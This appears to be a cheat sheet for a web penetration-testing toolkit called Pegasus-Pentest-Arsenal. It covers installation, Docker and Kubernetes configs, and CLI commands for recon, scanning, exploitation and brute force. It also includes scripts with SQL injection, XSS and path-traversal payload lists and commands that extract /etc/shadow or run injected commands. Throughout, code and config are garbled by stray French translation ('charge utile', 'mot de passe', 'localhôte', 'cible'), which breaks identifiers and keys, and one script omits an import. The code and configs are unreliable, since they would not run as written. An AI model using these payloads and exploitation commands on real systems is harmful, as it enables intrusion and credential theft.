Pegasus-Pentest-Arsenal aide-mémoire
Overview
Pegasus-Pentest-Arsenal is a comprehensive web security testing toolkit designed to streamline and automate various aspects of application web tests de pénétration. Developed as an all-in-one solution for security professionals, this arsenal combines multiple security testing tools and methodologies into a unified platform that simplifies the processus of identifying and exploiting application web vulnerabilities. The toolkit is particularly valuable for penetration testers who need to quickly assess application webs across different technologies and frameworks.
The arsenal distinguishes itself through its modular architecture and extensive automation capabilities. Rather than requiring security professionals to manually configure and execute dozens of different tools, Pegasus-Pentest-Arsenal provides a streamlined interface that orchestrates various security testing activities. The platform includes automated reconnaissance, vulnérabilité scanning, exploitation modules, and reporting capabilities, making it suitable for both quick security assessments and comprehensive tests de pénétration engagements.
The toolkit incorporates industry-standard security testing methodologies and integrates with popular security tools to provide comprehensive coverage of application web attack vectors. It supports testing for OWASP Top 10 vulnerabilities, advanced injection attacks, authentification bypasses, session management flaws, and business logic vulnerabilities. The platform's automation capabilities significantly reduce the time required for routine testing tasks while maintaining the thoroughness required for professional security assessments.
Pegasus-Pentest-Arsenal is designed with both novice and experienced penetration testers in mind. The platform provides guided workflows for beginners while offering advanced customization options for experienced professionals. Its reporting capabilities generate professional-grade documentation suitable for client deliverables, compliance requirements, and internal security assessments.
Installation
Docker Installation (Recommended)
# Clone Pegasus-Pentest-Arsenal repository
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git
cd pegasus-pentest-arsenal
# Build Docker image
docker build -t pegasus-arsenal .
# Run Pegasus Arsenal container
docker run -d -p 8080:8080 -p 8443:8443 --name pegasus-arsenal pegasus-arsenal
# Run with persistent data
docker run -d -p 8080:8080 -p 8443:8443 \
-v pegasus_data:/app/data \
-v pegasus_reports:/app/reports \
--name pegasus-arsenal pegasus-arsenal
# Access Pegasus Arsenal
# Web interface: http://localhôte:8080
# HTTPS interface: https://localhôte:8443
# Stop container
docker stop pegasus-arsenal
# Remove container
docker rm pegasus-arsenal
Docker Compose Installation
# Create docker-compose.yml
cat << 'EOF' > docker-compose.yml
version: '3.8'
services:
pegasus-arsenal:
build: .
container_name: pegasus-arsenal
ports:
- "8080: 8080"
- "8443: 8443"
- "1337: 1337" # Additional service port
volumes:
- pegasus_data: /app/data
- pegasus_reports: /app/reports
- pegasus_wordlists: /app/wordlists
- ./custom_modules: /app/custom_modules
environment:
- PEGASUS_MODE=production
- PEGASUS_DEBUG=false
- PEGASUS_API_clé=your_api_clé_here
restart: unless-stopped
networks:
- pegasus_network
pegasus-db:
image: postgres:13
container_name: pegasus-db
environment:
- POSTGRES_DB=pegasus
- POSTGRES_USER=pegasus
- POSTGRES_mot de passe=pegasus_mot de passe
volumes:
- pegasus_db_data: /var/lib/postgresql/data
networks:
- pegasus_network
volumes:
pegasus_data:
pegasus_reports:
pegasus_wordlists:
pegasus_db_data:
networks:
pegasus_network:
driver: bridge
EOF
# Start Pegasus Arsenal
docker-compose up -d
# View logs
docker-compose logs -f pegasus-arsenal
# Stop services
docker-compose down
# Stop and remove volumes
docker-compose down -v
Manual Installation on Ubuntu/Debian
# Update system
sudo apt update && sudo apt upgrade -y
# Install dependencies
sudo apt install -y python3 python3-pip python3-venv git curl wget \
nmap sqlmap nikto dirb gobuster wfuzz hydra john \
metasploit-framework burpsuite zaproxy
# Install Node.js and npm
curl -fsSL https://deb.nodesource.com/setup_16.x|sudo -E bash -
sudo apt install -y nodejs
# Clone repository
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git
cd pegasus-pentest-arsenal
# Create virtual environment
python3 -m venv venv
source venv/bin/activate
# Install Python dependencies
pip install -r requirements.txt
# Install Node.js dependencies
npm install
# Configure database
sudo apt install postgresql postgresql-contrib
sudo -u postgres createdb pegasus
sudo -u postgres createuser pegasus
sudo -u postgres psql -c "ALTER USER pegasus mot de passe 'pegasus_mot de passe';"
# Initialize database
python3 manage.py migrate
# Create superuser
python3 manage.py createsuperuser
# Start Pegasus Arsenal
python3 manage.py runserver 0.0.0.0:8080
Installation on CentOS/RHEL
# Install EPEL repository
sudo yum install epel-release -y
# Install dependencies
sudo yum groupinstall "Development Tools" -y
sudo yum install python3 python3-pip git curl wget \
nmap sqlmap nikto dirb hydra john -y
# Install additional security tools
sudo yum install snapd -y
sudo systemctl enable --now snapd.socket
sudo snap install burpsuite-community-edition
# Clone and setup
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git
cd pegasus-pentest-arsenal
# Setup Python environment
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
# Install PostgreSQL
sudo yum install postgresql postgresql-server postgresql-contrib -y
sudo postgresql-setup initdb
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Configure database
sudo -u postgres createdb pegasus
sudo -u postgres createuser pegasus
sudo -u postgres psql -c "ALTER USER pegasus mot de passe 'pegasus_mot de passe';"
# Start application
python3 manage.py runserver 0.0.0.0:8080
Kubernetes Deployment
# Create pegasus-deployment.yaml
cat << 'EOF' > pegasus-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: pegasus-arsenal
labels:
app: pegasus-arsenal
spec:
replicas: 2
selector:
matchLabels:
app: pegasus-arsenal
template:
metadata:
labels:
app: pegasus-arsenal
spec:
containers:
- name: pegasus-arsenal
image: pegasus-arsenal:latest
ports:
- containerport: 8080
- containerport: 8443
env:
- name: PEGASUS_MODE
value: "production"
- name: DATABASE_URL
value: "postgresql://pegasus:mot de passe@pegasus-db:5432/pegasus"
volumeMounts:
- name: pegasus-data
mountPath: /app/data
- name: pegasus-reports
mountPath: /app/reports
volumes:
- name: pegasus-data
persistentVolumeClaim:
claimName: pegasus-data-pvc
- name: pegasus-reports
persistentVolumeClaim:
claimName: pegasus-reports-pvc
---
apiVersion: v1
kind: service
metadata:
name: pegasus-arsenal-service
spec:
selector:
app: pegasus-arsenal
ports:
- name: http
port: 8080
cibleport: 8080
- name: https
port: 8443
cibleport: 8443
type: LoadBalancer
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: pegasus-db
spec:
replicas: 1
selector:
matchLabels:
app: pegasus-db
template:
metadata:
labels:
app: pegasus-db
spec:
containers:
- name: postgres
image: postgres:13
env:
- name: POSTGRES_DB
value: "pegasus"
- name: POSTGRES_USER
value: "pegasus"
- name: POSTGRES_mot de passe
value: "mot de passe"
volumeMounts:
- name: postgres-data
mountPath: /var/lib/postgresql/data
volumes:
- name: postgres-data
persistentVolumeClaim:
claimName: postgres-data-pvc
---
apiVersion: v1
kind: service
metadata:
name: pegasus-db
spec:
selector:
app: pegasus-db
ports:
- port: 5432
cibleport: 5432
EOF
# Deploy to Kubernetes
kubectl apply -f pegasus-deployment.yaml
# Check deployment status
kubectl get pods
kubectl get services
# Access Pegasus Arsenal
kubectl port-forward service/pegasus-arsenal-service 8080: 8080
Initial configuration
First-Time Setup
# Access Pegasus Arsenal web interface
# Navigate to http://localhôte:8080
# Initial configuration wizard
# 1. Set admin identifiants
# 2. Configure database connexion
# 3. Set API clés for external services
# 4. Configure tool paths
# 5. Set up reporting préférences
# commande-line configuration
python3 manage.py configure --interactive
# Non-interactive configuration
python3 manage.py configure \
--admin-user admin \
--admin-mot de passe secure_mot de passe \
--database-url postgresql://pegasus:mot de passe@localhôte:5432/pegasus \
--api-clés-file api_clés.json
API clés configuration
# Create API clés configuration file
cat << 'EOF' > api_clés.json
\\\\{
"virustotal": "your_virustotal_api_clé",
"shodan": "your_shodan_api_clé",
"censys": "your_censys_api_clé",
"securitytrails": "your_securitytrails_api_clé",
"hunter": "your_hunter_api_clé",
"dehashed": "your_dehashed_api_clé",
"hibp": "your_hibp_api_clé",
"whoisxml": "your_whoisxml_api_clé"
\\\\}
EOF
# Load API clés
python3 manage.py load_api_clés --file api_clés.json
# Test API connectivity
python3 manage.py test_apis
# Update individual API clé
python3 manage.py set_api_clé --service virustotal --clé your_new_clé
Tool configuration
# Configure external tool paths
cat << 'EOF' > tool_config.json
\\\\{
"nmap": "/usr/bin/nmap",
"sqlmap": "/usr/bin/sqlmap",
"nikto": "/usr/bin/nikto",
"dirb": "/usr/bin/dirb",
"gobuster": "/usr/bin/gobuster",
"wfuzz": "/usr/bin/wfuzz",
"hydra": "/usr/bin/hydra",
"john": "/usr/bin/john",
"hashcat": "/usr/bin/hashcat",
"metasploit": "/usr/bin/msfconsole",
"burpsuite": "/usr/bin/burpsuite",
"zaproxy": "/usr/bin/zaproxy"
\\\\}
EOF
# Load tool configuration
python3 manage.py configure_tools --file tool_config.json
# Verify tool Installation
python3 manage.py verify_tools
# Update tool paths
python3 manage.py update_tool_path --tool nmap --path /opt/nmap/bin/nmap
Core Modules and Features
reconnaissance Module
# Passive reconnaissance
pegasus-cli recon passive --cible exemple.com
# Active reconnaissance
pegasus-cli recon active --cible exemple.com --deep
# Subdomain énumération
pegasus-cli recon subdomains --cible exemple.com \
--wordlist /app/wordlists/subdomains.txt \
--dns-bruteforce \
--certificat-transparency
# scan de ports
pegasus-cli recon ports --cible exemple.com \
--ports 1-65535 \
--service-detection \
--os-detection
# Technology stack identification
pegasus-cli recon tech --cible exemple.com \
--empreinte-cms \
--identify-frameworks \
--detect-waf
# OSINT gathering
pegasus-cli recon osint --cible exemple.com \
--social-media \
--email-harvesting \
--leaked-identifiants
vulnérabilité Scanning Module
# Comprehensive vulnérabilité scan
pegasus-cli scan vuln --cible http://exemple.com \
--scan-type comprehensive \
--include-owasp-top10
# Specific vulnérabilité types
pegasus-cli scan vuln --cible http://exemple.com \
--scan-types sqli,xss,csrf,lfi,rfi
# Authenticated scanning
pegasus-cli scan vuln --cible http://exemple.com \
--auth-type form \
--nom d'utilisateur admin \
--mot de passe mot de passe \
--login-url /login
# API vulnérabilité scanning
pegasus-cli scan api --cible http://api.exemple.com \
--swagger-url /swagger.json \
--test-authentification \
--test-autorisation
# SSL/TLS security assessment
pegasus-cli scan ssl --cible exemple.com \
--check-certificats \
--test-ciphers \
--check-vulnerabilities
# application web firewall detection
pegasus-cli scan waf --cible http://exemple.com \
--detection-methods all \
--bypass-attempts
exploitation Module
# injection SQL exploitation
pegasus-cli exploit sqli --cible http://exemple.com/page.php?id=1 \
--technique union \
--dump-database \
--extract-mot de passes
# cross-site scripting (XSS) exploitation
pegasus-cli exploit xss --cible http://exemple.com/search \
--paramètre q \
--charge utile-type reflected \
--generate-poc
# File inclusion exploitation
pegasus-cli exploit lfi --cible http://exemple.com/page.php?file=index \
--technique traversal \
--extract-files /etc/passwd,/etc/shadow
# injection de commandees exploitation
pegasus-cli exploit cmdi --cible http://exemple.com/ping.php \
--paramètre hôte \
--technique blind \
--execute-commandes
# authentification bypass
pegasus-cli exploit auth --cible http://exemple.com/login \
--technique sqli \
--nom d'utilisateur-field user \
--mot de passe-field pass
# session hijacking
pegasus-cli exploit session --cible http://exemple.com \
--technique prediction \
--cookie-name PHPSESSID
force brute Module
# Login force brute
pegasus-cli bruteforce login --cible http://exemple.com/login \
--nom d'utilisateur-list /app/wordlists/nom d'utilisateurs.txt \
--mot de passe-list /app/wordlists/mot de passes.txt \
--threads 10
# Directory force brute
pegasus-cli bruteforce dirs --cible http://exemple.com \
--wordlist /app/wordlists/directories.txt \
--extensions php,asp,aspx,jsp \
--recursive
# Subdomain force brute
pegasus-cli bruteforce subdomains --cible exemple.com \
--wordlist /app/wordlists/subdomains.txt \
--resolver 8.8.8.8 \
--threads 50
# paramètre force brute
pegasus-cli bruteforce params --cible http://exemple.com/page.php \
--wordlist /app/wordlists/paramètres.txt \
--method GET,POST
# cassage de hash
pegasus-cli bruteforce hash --hash-file hashes.txt \
--hash-type md5 \
--wordlist /app/wordlists/rockyou.txt \
--rules best64
# SSH force brute
pegasus-cli bruteforce ssh --cible 192.168.1.100 \
--nom d'utilisateur-list users.txt \
--mot de passe-list mot de passes.txt \
--threads 5
Advanced Testing Techniques
Custom charge utile Development
#!/usr/bin/env python3
# Custom charge utile generator for Pegasus Arsenal
import json
import base64
from urllib.parse import quote
class Pegasuscharge utileGenerator:
def __init__(self):
self.charge utiles = \\\\{
'sqli': [],
'xss': [],
'lfi': [],
'cmdi': [],
'xxe': []
\\\\}
def generate_sqli_charge utiles(self, cible_db='mysql'):
"""Generate injection SQL charge utiles"""
base_charge utiles = [
"' OR '1'='1",
"' OR 1=1 --",
"' UNION SELECT null, version() --",
"' AND (SELECT COUNT(*) FROM information_schema.tables)>0 --"
]
if cible_db == 'mysql':
base_charge utiles.extend([
"' UNION SELECT user(), database() --",
"' AND (SELECT SUBSTRING(@@version,1,1))='5' --"
])
elif cible_db == 'postgresql':
base_charge utiles.extend([
"' UNION SELECT current_user, current_database() --",
"' AND (SELECT version()) LIKE '%PostgreSQL%' --"
])
self.charge utiles['sqli'] = base_charge utiles
return base_charge utiles
def generate_xss_charge utiles(self, context='html'):
"""Generate XSS charge utiles for different contexts"""
html_charge utiles = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"<iframe src=javascript:alert('XSS')>"
]
js_charge utiles = [
"';alert('XSS');//",
"\";alert('XSS');//",
"'-alert('XSS')-'",
"\"-alert('XSS')-\""
]
attr_charge utiles = [
"\" onmouseover=alert('XSS') \"",
"' onmouseover=alert('XSS') '",
"javascript:alert('XSS')"
]
if context == 'html':
self.charge utiles['xss'] = html_charge utiles
elif context == 'javascript':
self.charge utiles['xss'] = js_charge utiles
elif context == 'attribute':
self.charge utiles['xss'] = attr_charge utiles
else:
self.charge utiles['xss'] = html_charge utiles + js_charge utiles + attr_charge utiles
return self.charge utiles['xss']
def generate_lfi_charge utiles(self, os_type='linux'):
"""Generate Local File Inclusion charge utiles"""
linux_charge utiles = [
"../../../etc/passwd",
"....//....//....//etc/passwd",
"..%252f..%252f..%252fetc%252fpasswd",
"/etc/passwd%00",
"php://filter/convert.base64-encode/resource=../../../etc/passwd"
]
windows_charge utiles = [
"..\\..\\..\\windows\\system32\\drivers\\etc\\hôtes",
"....\\\\....\\\\....\\\\windows\\\\win.ini",
"..%255c..%255c..%255cwindows%255cwin.ini",
"C:\\windows\\win.ini%00"
]
if os_type == 'linux':
self.charge utiles['lfi'] = linux_charge utiles
elif os_type == 'windows':
self.charge utiles['lfi'] = windows_charge utiles
else:
self.charge utiles['lfi'] = linux_charge utiles + windows_charge utiles
return self.charge utiles['lfi']
def encode_charge utiles(self, charge utiles, encoding='url'):
"""Encode charge utiles for bypass attempts"""
encoded = []
for charge utile in charge utiles:
if encoding == 'url':
encoded.append(quote(charge utile))
elif encoding == 'base64':
encoded.append(base64.b64encode(charge utile.encode()).decode())
elif encoding == 'html':
encoded.append(''.join(f'&#\\\\{ord(c)\\\\};' for c in charge utile))
return encoded
def export_charge utiles(self, filename='custom_charge utiles.json'):
"""Export charge utiles to JSON file"""
with open(filename, 'w') as f:
json.dump(self.charge utiles, f, indent=2)
print(f"charge utiles exported to \\\\{filename\\\\}")
# utilisation exemple
if __name__ == "__main__":
generator = Pegasuscharge utileGenerator()
# Generate charge utiles
sqli_charge utiles = generator.generate_sqli_charge utiles('mysql')
xss_charge utiles = generator.generate_xss_charge utiles('html')
lfi_charge utiles = generator.generate_lfi_charge utiles('linux')
# Encode for bypass
encoded_sqli = generator.encode_charge utiles(sqli_charge utiles, 'url')
# Export all charge utiles
generator.export_charge utiles()
Automated Testing Workflows
#!/bin/bash
# Pegasus Arsenal automated testing workflow
cible="$1"
OUTPUT_DIR="pegasus_results_$(date +%Y%m%d_%H%M%S)"
if [ -z "$cible" ]; then
echo "utilisation: $0 <cible>"
exit 1
fi
echo "[*] Starting Pegasus Arsenal automated testing for $cible"
mkdir -p "$OUTPUT_DIR"
# Phase 1: reconnaissance
echo "[*] Phase 1: reconnaissance"
pegasus-cli recon passive --cible "$cible" --output "$OUTPUT_DIR/recon_passive.json"
pegasus-cli recon active --cible "$cible" --output "$OUTPUT_DIR/recon_active.json"
pegasus-cli recon subdomains --cible "$cible" --output "$OUTPUT_DIR/subdomains.json"
# Phase 2: scan de ports
echo "[*] Phase 2: scan de ports"
pegasus-cli recon ports --cible "$cible" --ports 1-65535 --output "$OUTPUT_DIR/ports.json"
# Phase 3: Technology Detection
echo "[*] Phase 3: Technology Detection"
pegasus-cli recon tech --cible "$cible" --output "$OUTPUT_DIR/technology.json"
# Phase 4: vulnérabilité Scanning
echo "[*] Phase 4: vulnérabilité Scanning"
pegasus-cli scan vuln --cible "http://$cible" --scan-type comprehensive --output "$OUTPUT_DIR/vulnerabilities.json"
# Phase 5: SSL/TLS Assessment
echo "[*] Phase 5: SSL/TLS Assessment"
pegasus-cli scan ssl --cible "$cible" --output "$OUTPUT_DIR/ssl_assessment.json"
# Phase 6: Directory force brute
echo "[*] Phase 6: Directory force brute"
pegasus-cli bruteforce dirs --cible "http://$cible" --output "$OUTPUT_DIR/directories.json"
# Phase 7: exploitation (if vulnerabilities found)
echo "[*] Phase 7: exploitation"
if grep -q "sql_injection" "$OUTPUT_DIR/vulnerabilities.json"; then
pegasus-cli exploit sqli --cible "http://$cible" --auto-detect --output "$OUTPUT_DIR/sqli_exploitation.json"
fi
if grep -q "xss" "$OUTPUT_DIR/vulnerabilities.json"; then
pegasus-cli exploit xss --cible "http://$cible" --auto-detect --output "$OUTPUT_DIR/xss_exploitation.json"
fi
# Phase 8: Report Generation
echo "[*] Phase 8: Report Generation"
pegasus-cli report generate --input-dir "$OUTPUT_DIR" --format html --output "$OUTPUT_DIR/final_report.html"
pegasus-cli report generate --input-dir "$OUTPUT_DIR" --format pdf --output "$OUTPUT_DIR/final_report.pdf"
echo "[*] Testing complete. Results saved to $OUTPUT_DIR"
echo "[*] Open $OUTPUT_DIR/final_report.html to view the results"
Custom Module Development
#!/usr/bin/env python3
# Custom Pegasus Arsenal module template
from pegasus.core.module import BaseModule
from pegasus.core.logger import get_logger
import requests
import json
class CustomWebTestModule(BaseModule):
"""Custom application web testing module"""
def __init__(self):
super().__init__()
self.name = "Custom Web Test"
self.Description = "Custom application web security testing module"
self.version = "1.0.0"
self.author = "Security Researcher"
self.logger = get_logger(__name__)
# Module options
self.options = \\\\{
'cible': \\\\{
'Description': 'cible URL',
'required': True,
'default': ''
\\\\},
'timeout': \\\\{
'Description': 'Request timeout in seconds',
'required': False,
'default': 10
\\\\},
'user_agent': \\\\{
'Description': 'Custom User-Agent string',
'required': False,
'default': 'Pegasus-Arsenal/1.0'
\\\\}
\\\\}
def validate_options(self):
"""Validate module options"""
if not self.options['cible']['value']:
raise ValueError("cible URL is required")
if not self.options['cible']['value'].startswith(('http://', 'https://')):
raise ValueError("cible must be a valid HTTP/HTTPS URL")
def run(self):
"""Execute the module"""
self.logger.info(f"Starting custom web test for \\\\{self.options['cible']['value']\\\\}")
try:
self.validate_options()
# Custom testing logic
results = self.perform_custom_tests()
# processus and return results
return self.format_results(results)
except Exception as e:
self.logger.error(f"Module execution failed: \\\\{e\\\\}")
return \\\\{'error': str(e)\\\\}
def perform_custom_tests(self):
"""Perform custom security tests"""
cible = self.options['cible']['value']
timeout = int(self.options['timeout']['value'])
user_agent = self.options['user_agent']['value']
headers = \\\\{'User-Agent': user_agent\\\\}
results = \\\\{
'cible': cible,
'tests': []
\\\\}
# Test 1: Check for sensitive files
sensitive_files = [
'/robots.txt',
'/.htaccess',
'/web.config',
'/backup.sql',
'/config.php.bak'
]
for file_path in sensitive_files:
test_url = cible.rstrip('/') + file_path
try:
response = requests.get(test_url, headers=headers, timeout=timeout)
test_result = \\\\{
'test_name': 'Sensitive File Check',
'url': test_url,
'status_code': response.status_code,
'vulnerable': response.status_code == 200,
'details': f"File \\\\{file_path\\\\} accessible" if response.status_code == 200 else None
\\\\}
results['tests'].append(test_result)
except requests.RequestException as e:
self.logger.warning(f"Request failed for \\\\{test_url\\\\}: \\\\{e\\\\}")
# Test 2: Check for common vulnerabilities
vuln_tests = [
\\\\{
'name': 'XSS Test',
'charge utile': '<script>alert("XSS")</script>',
'paramètre': 'q'
\\\\},
\\\\{
'name': 'injection SQL Test',
'charge utile': "' OR '1'='1",
'paramètre': 'id'
\\\\}
]
for test in vuln_tests:
test_url = f"\\\\{cible\\\\}?\\\\{test['paramètre']\\\\}=\\\\{test['charge utile']\\\\}"
try:
response = requests.get(test_url, headers=headers, timeout=timeout)
vulnerable = test['charge utile'] in response.text
test_result = \\\\{
'test_name': test['name'],
'url': test_url,
'vulnerable': vulnerable,
'charge utile': test['charge utile'],
'details': f"charge utile reflected in response" if vulnerable else None
\\\\}
results['tests'].append(test_result)
except requests.RequestException as e:
self.logger.warning(f"Request failed for \\\\{test_url\\\\}: \\\\{e\\\\}")
return results
def format_results(self, results):
"""Format results for output"""
formatted = \\\\{
'module': self.name,
'cible': results['cible'],
'timestamp': self.get_timestamp(),
'summary': \\\\{
'total_tests': len(results['tests']),
'vulnerabilities_found': sum(1 for test in results['tests'] if test.get('vulnerable', False))
\\\\},
'vulnerabilities': [test for test in results['tests'] if test.get('vulnerable', False)],
'all_tests': results['tests']
\\\\}
return formatted
# Register module with Pegasus Arsenal
def register_module():
return CustomWebTestModule()
Integration with Security Tools
Burp Suite Integration
#!/usr/bin/env python3
# Pegasus Arsenal - Burp Suite integration
import requests
import json
import base64
class PegasusBurpIntegration:
def __init__(self, burp_api_url="http://localhôte:1337", api_clé=None):
self.burp_api_url = burp_api_url
self.api_clé = api_clé
self.session = requests.session()
if api_clé:
self.session.headers.update(\\\\{'X-API-clé': api_clé\\\\})
def start_scan(self, cible_url, scan_type="crawl_and_audit"):
"""Start Burp Suite scan via API"""
scan_config = \\\\{
"scan_configurations": [
\\\\{
"name": scan_type,
"type": "Namedconfiguration"
\\\\}
],
"urls": [cible_url]
\\\\}
response = self.session.post(
f"\\\\{self.burp_api_url\\\\}/v0.1/scan",
json=scan_config
)
if response.status_code == 201:
scan_id = response.headers.get('Location').split('/')[-1]
return scan_id
else:
raise Exception(f"Failed to start scan: \\\\{response.text\\\\}")
def get_scan_status(self, scan_id):
"""Get scan status"""
response = self.session.get(f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}")
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Failed to get scan status: \\\\{response.text\\\\}")
def get_scan_issues(self, scan_id):
"""Get scan issues/vulnerabilities"""
response = self.session.get(f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}/issues")
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Failed to get scan issues: \\\\{response.text\\\\}")
def export_scan_report(self, scan_id, report_format="HTML"):
"""Export scan report"""
export_config = \\\\{
"scan_id": scan_id,
"report_type": report_format
\\\\}
response = self.session.post(
f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}/report",
json=export_config
)
if response.status_code == 200:
return response.content
else:
raise Exception(f"Failed to export report: \\\\{response.text\\\\}")
# Integration with Pegasus Arsenal
def integrate_with_pegasus(cible_url):
"""Integrate Burp Suite scan with Pegasus Arsenal"""
burp = PegasusBurpIntegration()
# Start scan
scan_id = burp.start_scan(cible_url)
print(f"Started Burp Suite scan: \\\\{scan_id\\\\}")
# Monitor scan progress
while True:
status = burp.get_scan_status(scan_id)
if status['scan_status'] == 'succeeded':
print("Scan completed successfully")
break
elif status['scan_status'] == 'failed':
print("Scan failed")
break
else:
print(f"Scan in progress: \\\\{status['scan_metrics']['crawl_requests_made']\\\\} requests made")
time.sleep(30)
# Get issues
issues = burp.get_scan_issues(scan_id)
# Export report
report = burp.export_scan_report(scan_id, "HTML")
with open(f"burp_report_\\\\{scan_id\\\\}.html", "wb") as f:
f.write(report)
return issues
OWASP ZAP Integration
#!/usr/bin/env python3
# Pegasus Arsenal - OWASP ZAP integration
from zapv2 import ZAPv2
import time
import json
class PegasusZAPIntegration:
def __init__(self, zap_proxy="http://localhôte:8080"):
self.zap = ZAPv2(proxies=\\\\{'http': zap_proxy, 'https': zap_proxy\\\\})
def spider_cible(self, cible_url):
"""Spider cible application"""
print(f"Starting spider scan for \\\\{cible_url\\\\}")
scan_id = self.zap.spider.scan(cible_url)
# Wait for spider to complete
while int(self.zap.spider.status(scan_id)) < 100:
print(f"Spider progress: \\\\{self.zap.spider.status(scan_id)\\\\}%")
time.sleep(5)
print("Spider scan completed")
return self.zap.spider.results(scan_id)
def active_scan(self, cible_url):
"""Perform active security scan"""
print(f"Starting active scan for \\\\{cible_url\\\\}")
scan_id = self.zap.ascan.scan(cible_url)
# Wait for active scan to complete
while int(self.zap.ascan.status(scan_id)) < 100:
print(f"Active scan progress: \\\\{self.zap.ascan.status(scan_id)\\\\}%")
time.sleep(10)
print("Active scan completed")
return scan_id
def get_alerts(self, baseurl=None):
"""Get security alerts"""
return self.zap.core.alerts(baseurl)
def generate_report(self, format_type="HTML"):
"""Generate security report"""
if format_type.upper() == "HTML":
return self.zap.core.htmlreport()
elif format_type.upper() == "XML":
return self.zap.core.xmlreport()
elif format_type.upper() == "JSON":
return self.zap.core.jsonreport()
else:
raise ValueError("Unsupported report format")
def comprehensive_scan(self, cible_url):
"""Perform comprehensive security assessment"""
results = \\\\{
'cible': cible_url,
'spider_results': [],
'alerts': [],
'scan_summary': \\\\{\\\\}
\\\\}
# Spider the application
spider_results = self.spider_cible(cible_url)
results['spider_results'] = spider_results
# Perform active scan
scan_id = self.active_scan(cible_url)
# Get alerts
alerts = self.get_alerts(cible_url)
results['alerts'] = alerts
# Generate summary
results['scan_summary'] = \\\\{
'total_urls_found': len(spider_results),
'total_alerts': len(alerts),
'high_risk_alerts': len([a for a in alerts if a['risk'] == 'High']),
'medium_risk_alerts': len([a for a in alerts if a['risk'] == 'Medium']),
'low_risk_alerts': len([a for a in alerts if a['risk'] == 'Low'])
\\\\}
return results
# Integration function
def run_zap_scan_for_pegasus(cible_url):
"""Run ZAP scan and integrate with Pegasus Arsenal"""
zap_integration = PegasusZAPIntegration()
# Perform comprehensive scan
results = zap_integration.comprehensive_scan(cible_url)
# Generate reports
html_report = zap_integration.generate_report("HTML")
json_report = zap_integration.generate_report("JSON")
# Save reports
with open(f"zap_report_\\\\{cible_url.replace('://', '_').replace('/', '_')\\\\}.html", "w") as f:
f.write(html_report)
with open(f"zap_results_\\\\{cible_url.replace('://', '_').replace('/', '_')\\\\}.json", "w") as f:
f.write(json_report)
return results
Reporting and documentation
Automated Report Generation
#!/usr/bin/env python3
# Pegasus Arsenal automated report generator
import json
import datetime
from jinja2 import Template
import pdfkit
class PegasusReportGenerator:
def __init__(self):
self.report_data = \\\\{\\\\}
self.templates = \\\\{
'executive_summary': self.get_executive_template(),
'technical_details': self.get_technical_template(),
'recommendations': self.get_recommendations_template()
\\\\}
def load_scan_results(self, results_file):
"""Load scan results from JSON file"""
with open(results_file, 'r') as f:
self.report_data = json.load(f)
def generate_executive_summary(self):
"""Generate executive summary"""
template = Template(self.templates['executive_summary'])
# Calculate risk metrics
total_vulns = len(self.report_data.get('vulnerabilities', []))
high_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'High'])
medium_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'Medium'])
low_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'Low'])
summary_data = \\\\{
'cible': self.report_data.get('cible', 'Unknown'),
'scan_date': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
'total_vulnerabilities': total_vulns,
'high_risk_count': high_risk,
'medium_risk_count': medium_risk,
'low_risk_count': low_risk,
'risk_score': self.calculate_risk_score(high_risk, medium_risk, low_risk)
\\\\}
return template.render(**summary_data)
def generate_technical_details(self):
"""Generate technical details section"""
template = Template(self.templates['technical_details'])
return template.render(
vulnerabilities=self.report_data.get('vulnerabilities', []),
scan_details=self.report_data.get('scan_details', \\\\{\\\\}),
cible_info=self.report_data.get('cible_info', \\\\{\\\\})
)
def generate_recommendations(self):
"""Generate recommendations section"""
template = Template(self.templates['recommendations'])
# Generate recommendations based on vulnerabilities found
recommendations = self.generate_vuln_recommendations()
return template.render(recommendations=recommendations)
def generate_full_report(self, output_format='html'):
"""Generate complete security assessment report"""
report_sections = \\\\{
'executive_summary': self.generate_executive_summary(),
'technical_details': self.generate_technical_details(),
'recommendations': self.generate_recommendations()
\\\\}
full_report_template = """
<!DOCTYPE html>
<html>
<head>
<title>Pegasus Arsenal Security Assessment Report</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 40px; \\\\}
.header \\\\{ text-align: center; border-bottom: 2px solid #333; padding-bottom: 20px; \\\\}
.section \\\\{ margin: 30px 0; \\\\}
.vulnérabilité \\\\{ border: 1px solid #ddd; padding: 15px; margin: 10px 0; \\\\}
.high-risk \\\\{ border-left: 5px solid #d32f2f; \\\\}
.medium-risk \\\\{ border-left: 5px solid #f57c00; \\\\}
.low-risk \\\\{ border-left: 5px solid #388e3c; \\\\}
.recommendation \\\\{ background: #f5f5f5; padding: 15px; margin: 10px 0; \\\\}
</style>
</head>
<body>
<div class="header">
<h1>Security Assessment Report</h1>
<h2>Generated by Pegasus Arsenal</h2>
</div>
<div class="section">
<h2>Executive Summary</h2>
\\\\{\\\\{ executive_summary \\\\}\\\\}
</div>
<div class="section">
<h2>Technical Details</h2>
\\\\{\\\\{ technical_details \\\\}\\\\}
</div>
<div class="section">
<h2>Recommendations</h2>
\\\\{\\\\{ recommendations \\\\}\\\\}
</div>
</body>
</html>
"""
template = Template(full_report_template)
html_report = template.render(**report_sections)
if output_format.lower() == 'html':
return html_report
elif output_format.lower() == 'pdf':
return pdfkit.from_string(html_report, False)
else:
raise ValueError("Unsupported output format")
def calculate_risk_score(self, high, medium, low):
"""Calculate overall risk score"""
score = (high * 10) + (medium * 5) + (low * 1)
if score >= 50:
return "Critical"
elif score >= 25:
return "High"
elif score >= 10:
return "Medium"
else:
return "Low"
